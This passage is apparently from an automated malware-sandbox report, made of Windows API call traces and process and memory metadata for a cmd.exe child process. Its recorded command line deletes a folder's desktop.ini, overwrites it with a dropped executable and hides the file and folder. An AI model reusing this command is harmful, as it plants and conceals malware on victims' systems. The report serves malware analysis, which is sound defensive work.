lpBuffer=0x28ee90*, lpNumberOfBytesWritten=0x28de94*=0x20, lpOverlapped=0x0) returned 1 [0127.801] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.801] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28de80 | out: lpNewFilePointer=0x0) returned 1 [0127.801] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.802] ReadFile (in: hFile=0x54, lpBuffer=0x28ecb0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28dea0, lpOverlapped=0x0 | out: lpBuffer=0x28ecb0*, lpNumberOfBytesRead=0x28dea0*=0x200, lpOverlapped=0x0) returned 1 [0127.802] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.802] GetFileType (hFile=0x4c) returned 0x1 [0127.802] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.802] GetFileType (hFile=0x4c) returned 0x1 [0127.802] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.802] WriteFile (in: hFile=0x4c, lpBuffer=0x28ecb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ecb0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.802] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.802] GetFileType (hFile=0x4c) returned 0x1 [0127.802] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.802] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ed00*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.802] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.802] GetFileType (hFile=0x4c) returned 0x1 [0127.802] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.802] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ed50*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.802] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.802] GetFileType (hFile=0x4c) returned 0x1 [0127.802] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0127.802] WriteFile (in: hFile=0x4c, lpBuffer=0x28eda0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28eda0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.802] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.802] GetFileType (hFile=0x4c) returned 0x1 [0127.802] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.802] WriteFile (in: hFile=0x4c, lpBuffer=0x28edf0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28edf0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.803] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.803] GetFileType (hFile=0x4c) returned 0x1 [0127.803] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.803] WriteFile (in: hFile=0x4c, lpBuffer=0x28ee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ee40*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.803] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.803] GetFileType (hFile=0x4c) returned 0x1 [0127.803] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.803] WriteFile (in: hFile=0x4c, lpBuffer=0x28ee90*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ee90*, lpNumberOfBytesWritten=0x28de94*=0x20, lpOverlapped=0x0) returned 1 [0127.803] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.803] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28de80 | out: lpNewFilePointer=0x0) returned 1 [0127.803] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.803] ReadFile (in: hFile=0x54, lpBuffer=0x28ecb0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28dea0, lpOverlapped=0x0 | out: lpBuffer=0x28ecb0*, lpNumberOfBytesRead=0x28dea0*=0x32, lpOverlapped=0x0) returned 1 [0127.803] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.803] 
GetFileType (hFile=0x4c) returned 0x1 [0127.803] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.803] GetFileType (hFile=0x4c) returned 0x1 [0127.803] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.803] WriteFile (in: hFile=0x4c, lpBuffer=0x28ecb0*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ecb0*, lpNumberOfBytesWritten=0x28de94*=0x32, lpOverlapped=0x0) returned 1 [0127.803] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.803] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28de80 | out: lpNewFilePointer=0x0) returned 1 [0127.803] _close (_FileHandle=4) returned 0 [0127.804] FindNextFileW (in: hFindFile=0x2e0ee0, lpFindFileData=0x28ef14 | out: lpFindFileData=0x28ef14) returned 0 [0127.862] GetLastError () returned 0x12 [0127.862] FindClose (in: hFindFile=0x2e0ee0 | out: hFindFile=0x2e0ee0) returned 1 [0127.862] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0127.863] _close (_FileHandle=3) returned 0 [0127.863] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.863] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0127.863] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.863] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0127.863] _get_osfhandle (_FileHandle=0) returned 0x3 [0127.863] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0127.863] SetConsoleInputExeNameW () returned 0x1 [0127.863] GetConsoleOutputCP () returned 0x1b5 [0127.863] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0127.863] SetThreadUILanguage (LangId=0x0) returned 0x409 [0127.863] exit (_Code=0) Process: id = "82" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea168c0" os_pid = "0x87c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = 
"9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10383 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10384 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10385 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10386 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 10387 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 10388 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file 
name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10389 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10390 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 10391 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 10392 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 10441 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10442 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 10443 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10444 start_va = 0x3b0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 10445 start_va = 0x430000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 10446 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 10447 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = 
"kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10448 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 10449 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10450 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10451 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 10452 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 10453 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 10454 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 10455 start_va = 0x250000 end_va = 0x317fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 10456 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: 
"c:\\windows\\system32\\imm32.dll") Region: id = 10457 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 10458 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 10459 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 10460 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 10461 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 10462 start_va = 0x530000 end_va = 0x630fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10463 start_va = 0x640000 end_va = 0x123ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 10464 start_va = 0x1240000 end_va = 0x13a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001240000" filename = "" Region: id = 10497 start_va = 0x13b0000 end_va = 0x167efff entry_point = 0x13b0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 139 os_tid = 0x8a4 [0127.824] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24fa54 | out: lpSystemTimeAsFileTime=0x24fa54*(dwLowDateTime=0x861ff900, dwHighDateTime=0x1d440a9)) [0127.824] GetCurrentProcessId () returned 0x87c [0127.824] GetCurrentThreadId () returned 0x8a4 [0127.824] GetTickCount () returned 0x2903d [0127.824] QueryPerformanceCounter (in: 
lpPerformanceCount=0x24fa4c | out: lpPerformanceCount=0x24fa4c*=18461372325) returned 1 [0127.825] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0127.825] __set_app_type (_Type=0x1) [0127.825] __p__fmode () returned 0x76b331f4 [0127.825] __p__commode () returned 0x76b331fc [0127.826] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0127.826] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0127.826] GetCurrentThreadId () returned 0x8a4 [0127.826] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x8a4) returned 0x38 [0127.826] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0127.826] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0127.826] SetThreadUILanguage (LangId=0x0) returned 0x409 [0127.826] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0127.826] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24f9e4 | out: phkResult=0x24f9e4*=0x0) returned 0x2 [0127.827] VirtualQuery (in: lpAddress=0x24fa1b, lpBuffer=0x24f9b4, dwLength=0x1c | out: lpBuffer=0x24f9b4*(BaseAddress=0x24f000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0127.827] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x24f9b4, dwLength=0x1c | out: lpBuffer=0x24f9b4*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0127.827] VirtualQuery (in: lpAddress=0x151000, lpBuffer=0x24f9b4, dwLength=0x1c | out: lpBuffer=0x24f9b4*(BaseAddress=0x151000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x2000, 
State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0127.827] VirtualQuery (in: lpAddress=0x153000, lpBuffer=0x24f9b4, dwLength=0x1c | out: lpBuffer=0x24f9b4*(BaseAddress=0x153000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0127.827] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x24f9b4, dwLength=0x1c | out: lpBuffer=0x24f9b4*(BaseAddress=0x250000, AllocationBase=0x250000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0127.827] GetConsoleOutputCP () returned 0x1b5 [0127.827] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0127.827] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0127.827] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.827] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0127.827] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.827] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0127.827] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.827] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0127.828] _get_osfhandle (_FileHandle=0) returned 0x3 [0127.828] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0127.828] _get_osfhandle (_FileHandle=0) returned 0x3 [0127.828] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0127.828] GetEnvironmentStringsW () returned 0x440610* [0127.828] FreeEnvironmentStringsW (penv=0x440610) returned 1 [0127.828] GetEnvironmentStringsW () returned 0x440610* [0127.829] FreeEnvironmentStringsW (penv=0x440610) returned 1 [0127.829] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24e954 | out: phkResult=0x24e954*=0x40) returned 0x0 [0127.829] RegQueryValueExW (in: hKey=0x40, 
lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24e95c, lpData=0x24e960, lpcbData=0x24e958*=0x1000 | out: lpType=0x24e95c*=0x0, lpData=0x24e960*=0xc0, lpcbData=0x24e958*=0x1000) returned 0x2 [0127.829] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24e95c, lpData=0x24e960, lpcbData=0x24e958*=0x1000 | out: lpType=0x24e95c*=0x4, lpData=0x24e960*=0x1, lpcbData=0x24e958*=0x4) returned 0x0 [0127.829] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24e95c, lpData=0x24e960, lpcbData=0x24e958*=0x1000 | out: lpType=0x24e95c*=0x0, lpData=0x24e960*=0x1, lpcbData=0x24e958*=0x1000) returned 0x2 [0127.829] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24e95c, lpData=0x24e960, lpcbData=0x24e958*=0x1000 | out: lpType=0x24e95c*=0x4, lpData=0x24e960*=0x0, lpcbData=0x24e958*=0x4) returned 0x0 [0127.829] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24e95c, lpData=0x24e960, lpcbData=0x24e958*=0x1000 | out: lpType=0x24e95c*=0x4, lpData=0x24e960*=0x40, lpcbData=0x24e958*=0x4) returned 0x0 [0127.829] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24e95c, lpData=0x24e960, lpcbData=0x24e958*=0x1000 | out: lpType=0x24e95c*=0x4, lpData=0x24e960*=0x40, lpcbData=0x24e958*=0x4) returned 0x0 [0127.829] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24e95c, lpData=0x24e960, lpcbData=0x24e958*=0x1000 | out: lpType=0x24e95c*=0x0, lpData=0x24e960*=0x40, lpcbData=0x24e958*=0x1000) returned 0x2 [0127.829] RegCloseKey (hKey=0x40) returned 0x0 [0127.829] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24e954 | out: phkResult=0x24e954*=0x40) returned 0x0 [0127.829] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24e95c, 
lpData=0x24e960, lpcbData=0x24e958*=0x1000 | out: lpType=0x24e95c*=0x0, lpData=0x24e960*=0x40, lpcbData=0x24e958*=0x1000) returned 0x2 [0127.829] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24e95c, lpData=0x24e960, lpcbData=0x24e958*=0x1000 | out: lpType=0x24e95c*=0x4, lpData=0x24e960*=0x1, lpcbData=0x24e958*=0x4) returned 0x0 [0127.829] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24e95c, lpData=0x24e960, lpcbData=0x24e958*=0x1000 | out: lpType=0x24e95c*=0x0, lpData=0x24e960*=0x1, lpcbData=0x24e958*=0x1000) returned 0x2 [0127.829] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24e95c, lpData=0x24e960, lpcbData=0x24e958*=0x1000 | out: lpType=0x24e95c*=0x4, lpData=0x24e960*=0x0, lpcbData=0x24e958*=0x4) returned 0x0 [0127.829] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24e95c, lpData=0x24e960, lpcbData=0x24e958*=0x1000 | out: lpType=0x24e95c*=0x4, lpData=0x24e960*=0x9, lpcbData=0x24e958*=0x4) returned 0x0 [0127.829] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24e95c, lpData=0x24e960, lpcbData=0x24e958*=0x1000 | out: lpType=0x24e95c*=0x4, lpData=0x24e960*=0x9, lpcbData=0x24e958*=0x4) returned 0x0 [0127.829] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24e95c, lpData=0x24e960, lpcbData=0x24e958*=0x1000 | out: lpType=0x24e95c*=0x0, lpData=0x24e960*=0x9, lpcbData=0x24e958*=0x1000) returned 0x2 [0127.829] RegCloseKey (hKey=0x40) returned 0x0 [0127.830] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886362 [0127.830] srand (_Seed=0x5b886362) [0127.830] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" & 
type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\"" [0127.830] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\"" [0127.830] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0127.830] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x441d70, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0127.830] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0127.830] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0127.830] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0127.830] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0127.830] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0127.830] _wcsicmp 
(_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0127.830] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0127.830] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0127.831] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0127.831] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0127.831] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0127.831] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0127.831] GetEnvironmentStringsW () returned 0x442760* [0127.831] FreeEnvironmentStringsW (penv=0x442760) returned 1 [0127.831] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.831] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0127.831] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0127.831] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0127.831] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0127.831] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0127.831] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0127.831] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0127.831] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0127.831] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0127.831] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x24f720 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0127.831] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x24f720, lpFilePart=0x24f71c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x24f71c*="Desktop") returned 0x18 [0127.831] GetFileAttributesW 